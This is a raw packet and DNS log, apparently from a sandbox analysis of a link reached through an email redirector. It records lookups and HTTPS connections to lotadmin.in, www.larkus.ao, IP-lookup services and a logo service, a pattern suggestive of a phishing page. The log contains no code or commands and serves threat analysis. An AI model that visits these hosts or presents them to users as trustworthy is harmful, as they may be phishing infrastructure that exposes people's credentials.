                                                                                        Dec 9, 2024 17:47:10.117923975 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.119275093 CET49738443192.168.2.565.109.232.106
                                                                                        Dec 9, 2024 17:47:10.119297028 CET4434973865.109.232.106192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.244901896 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.245187044 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:10.245217085 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.246406078 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.246535063 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:10.247891903 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:10.247972012 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.248281002 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:10.248294115 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.260550976 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:10.260586977 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.260688066 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:10.261038065 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:10.261055946 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.301902056 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:10.357805967 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:10.357861042 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.357955933 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:10.358205080 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:10.358217001 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.376228094 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.376555920 CET49741443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.376566887 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.377065897 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.378947973 CET49741443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.379096985 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.379165888 CET49741443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.413463116 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.419331074 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.425318956 CET49741443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.453731060 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.453742027 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.453773022 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.453788042 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.453794956 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.453834057 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.453867912 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.453881025 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.453887939 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.453918934 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.502954006 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.573601961 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.573924065 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:11.573944092 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.575026035 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.575136900 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:11.575454950 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:11.575536966 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.575664043 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:11.604851007 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.604861975 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.604923010 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.604954958 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.604999065 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.605022907 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.605108023 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.605206966 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.605585098 CET49740443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.605601072 CET4434974013.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.623322010 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.628396988 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:11.628408909 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.675308943 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:11.751580954 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.751626015 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.751756907 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.751954079 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:11.751974106 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.796838045 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.797149897 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:11.797163963 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.798461914 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.798558950 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:11.800101995 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:11.800290108 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.800321102 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:11.831209898 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.831248999 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.831351995 CET49741443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.831365108 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.833291054 CET49741443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.833333015 CET4434974192.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.833415031 CET49741443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.837414980 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.837450981 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.837527037 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.837768078 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:11.837776899 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.843341112 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.855751991 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:11.855775118 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.902096033 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:12.020540953 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.020620108 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.020673037 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:12.021339893 CET49744443192.168.2.5104.26.12.205
                                                                                        Dec 9, 2024 17:47:12.021353960 CET44349744104.26.12.205192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.518615961 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.518737078 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.520263910 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:12.639333963 CET49742443192.168.2.5104.26.9.44
                                                                                        Dec 9, 2024 17:47:12.639357090 CET44349742104.26.9.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.800070047 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:12.800126076 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.800210953 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:12.800540924 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:12.800555944 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.102066994 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.103046894 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:13.103075981 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.103494883 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.103832960 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:13.103905916 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.104011059 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:13.148751974 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:13.148770094 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.316029072 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.316521883 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:13.316540956 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.317630053 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.317744017 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:13.318254948 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:13.318309069 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:13.318448067 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.364949942 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:13.364974976 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.411626101 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:13.556479931 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.556518078 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.556854963 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:13.556879044 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.557427883 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:13.557486057 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:13.557538033 CET49748443192.168.2.592.249.45.121
                                                                                        Dec 9, 2024 17:47:13.557550907 CET4434974892.249.45.121192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047358036 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047377110 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047385931 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047403097 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047410965 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047418118 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047486067 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:14.047508955 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.047593117 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:14.118889093 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.119046926 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:14.190893888 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.191032887 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.191231012 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:14.192699909 CET49747443192.168.2.513.227.8.72
                                                                                        Dec 9, 2024 17:47:14.192719936 CET4434974713.227.8.72192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.332307100 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.354796886 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:14.354819059 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.355999947 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.356180906 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:14.356990099 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:14.357050896 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.357311010 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:14.357319117 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.397936106 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:14.783844948 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.783966064 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:14.784039974 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:14.787040949 CET49750443192.168.2.5104.26.8.44
                                                                                        Dec 9, 2024 17:47:14.787065983 CET44349750104.26.8.44192.168.2.5
                                                                                        Dec 9, 2024 17:47:15.264169931 CET44349725142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:47:15.264245987 CET44349725142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:47:15.267997980 CET49725443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:47:15.322824001 CET49725443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:47:15.322854996 CET44349725142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:03.773329020 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:03.773382902 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:03.773529053 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:03.773727894 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:03.773741007 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:05.466161013 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:05.466471910 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:05.466510057 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:05.466864109 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:05.467175961 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:05.467267990 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:05.517077923 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:15.232705116 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:15.232767105 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:48:15.232819080 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:16.675683022 CET49870443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:48:16.675721884 CET44349870142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:03.836177111 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:03.836235046 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:03.836306095 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:03.836611986 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:03.836637020 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:05.525224924 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:05.525549889 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:05.525588036 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:05.525990009 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:05.526314974 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:05.526382923 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:05.565812111 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:15.236852884 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:15.236922979 CET44350008142.250.181.68192.168.2.5
                                                                                        Dec 9, 2024 17:49:15.237019062 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:16.134891033 CET50008443192.168.2.5142.250.181.68
                                                                                        Dec 9, 2024 17:49:16.134924889 CET44350008142.250.181.68192.168.2.5
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 9, 2024 17:46:59.659888029 CET6001853192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:46:59.660665989 CET5832953192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:00.012979031 CET53587051.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:00.014827013 CET53596261.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:00.244915962 CET53583291.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:00.246644974 CET53600181.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:02.891860008 CET6485053192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:02.892211914 CET6518753192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:03.281966925 CET53613741.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:03.294461012 CET53651871.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:03.294708014 CET53648501.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:03.726783037 CET5969053192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:03.726989985 CET6553153192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:03.870430946 CET53596901.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:03.871251106 CET53655311.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:04.180932999 CET6499053192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:05.103336096 CET6310353192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:05.103336096 CET5087153192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:05.106209040 CET5921853192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:05.106635094 CET6155353192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:05.240067959 CET53631031.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:05.240552902 CET53508711.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:05.883285999 CET53592181.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:05.884044886 CET53615531.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:07.016701937 CET5403853192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:07.016872883 CET4996153192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:07.154984951 CET53540381.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:07.155131102 CET53499611.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:07.923580885 CET5414853192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:07.923741102 CET6077853192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:07.930207014 CET5740253192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:07.930543900 CET5755253192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:07.932591915 CET5246953192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:07.932754993 CET6375653192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:08.061214924 CET53541481.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:08.061326027 CET53607781.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:08.070404053 CET53637561.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:08.070416927 CET53524691.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:08.390860081 CET53575521.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:08.443842888 CET53574021.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.121867895 CET5143053192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:10.122400999 CET5295453192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:10.218311071 CET5114653192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:10.218595982 CET5188553192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:10.259941101 CET53514301.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.259999037 CET53529541.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.356374025 CET53511461.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:10.357039928 CET53518851.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.609298944 CET5303353192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:11.609491110 CET5781753192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:11.749167919 CET53578171.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:11.750967026 CET53530331.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.659849882 CET5612353192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:12.660042048 CET6401453192.168.2.51.1.1.1
                                                                                        Dec 9, 2024 17:47:12.798304081 CET53640141.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:12.798494101 CET53561231.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:20.298866034 CET53496271.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:39.116100073 CET53495371.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:47:59.399241924 CET53625991.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:48:02.078239918 CET53639591.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:48:32.205729008 CET53641931.1.1.1192.168.2.5
                                                                                        Dec 9, 2024 17:49:16.359677076 CET53609561.1.1.1192.168.2.5
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 9, 2024 17:46:59.659888029 CET192.168.2.51.1.1.10x4a0dStandard query (0)go.eu.sparkpostmail1.comA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:46:59.660665989 CET192.168.2.51.1.1.10xdec5Standard query (0)go.eu.sparkpostmail1.com65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:02.891860008 CET192.168.2.51.1.1.10x61b5Standard query (0)lotadmin.inA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:02.892211914 CET192.168.2.51.1.1.10x29a6Standard query (0)lotadmin.in65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:03.726783037 CET192.168.2.51.1.1.10x6c10Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:03.726989985 CET192.168.2.51.1.1.10xb860Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:04.180932999 CET192.168.2.51.1.1.10xdaa7Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.103336096 CET192.168.2.51.1.1.10xd310Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.103336096 CET192.168.2.51.1.1.10xa57aStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.106209040 CET192.168.2.51.1.1.10xd091Standard query (0)www.larkus.aoA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:05.106635094 CET192.168.2.51.1.1.10x81abStandard query (0)www.larkus.ao65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.016701937 CET192.168.2.51.1.1.10xc52aStandard query (0)lotadmin.inA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.016872883 CET192.168.2.51.1.1.10x8c03Standard query (0)lotadmin.in65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.923580885 CET192.168.2.51.1.1.10x4538Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.923741102 CET192.168.2.51.1.1.10x5592Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.930207014 CET192.168.2.51.1.1.10xa5f4Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.930543900 CET192.168.2.51.1.1.10xbf8fStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.932591915 CET192.168.2.51.1.1.10x2462Standard query (0)www.larkus.aoA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:07.932754993 CET192.168.2.51.1.1.10x282cStandard query (0)www.larkus.ao65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.121867895 CET192.168.2.51.1.1.10x3907Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.122400999 CET192.168.2.51.1.1.10x50deStandard query (0)ipapi.co65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.218311071 CET192.168.2.51.1.1.10x81d7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:10.218595982 CET192.168.2.51.1.1.10xd5faStandard query (0)api.ipify.org65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.609298944 CET192.168.2.51.1.1.10x976bStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:11.609491110 CET192.168.2.51.1.1.10x45dfStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:12.659849882 CET192.168.2.51.1.1.10x155dStandard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:12.660042048 CET192.168.2.51.1.1.10xbb8bStandard query (0)ipapi.co65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 9, 2024 17:47:00.246644974 CET1.1.1.1192.168.2.50x4a0dNo error (0)go.eu.sparkpostmail1.com52.30.207.151A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:00.246644974 CET1.1.1.1192.168.2.50x4a0dNo error (0)go.eu.sparkpostmail1.com54.154.172.30A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:00.246644974 CET1.1.1.1192.168.2.50x4a0dNo error (0)go.eu.sparkpostmail1.com52.19.163.183A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:03.294708014 CET1.1.1.1192.168.2.50x61b5No error (0)lotadmin.in92.249.45.121A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:03.870430946 CET1.1.1.1192.168.2.50x6c10No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                        Dec 9, 2024 17:47:03.871251106 CET1.1.1.1192.168.2.50xb860No error (0)www.google.com65IN (0x0001)false
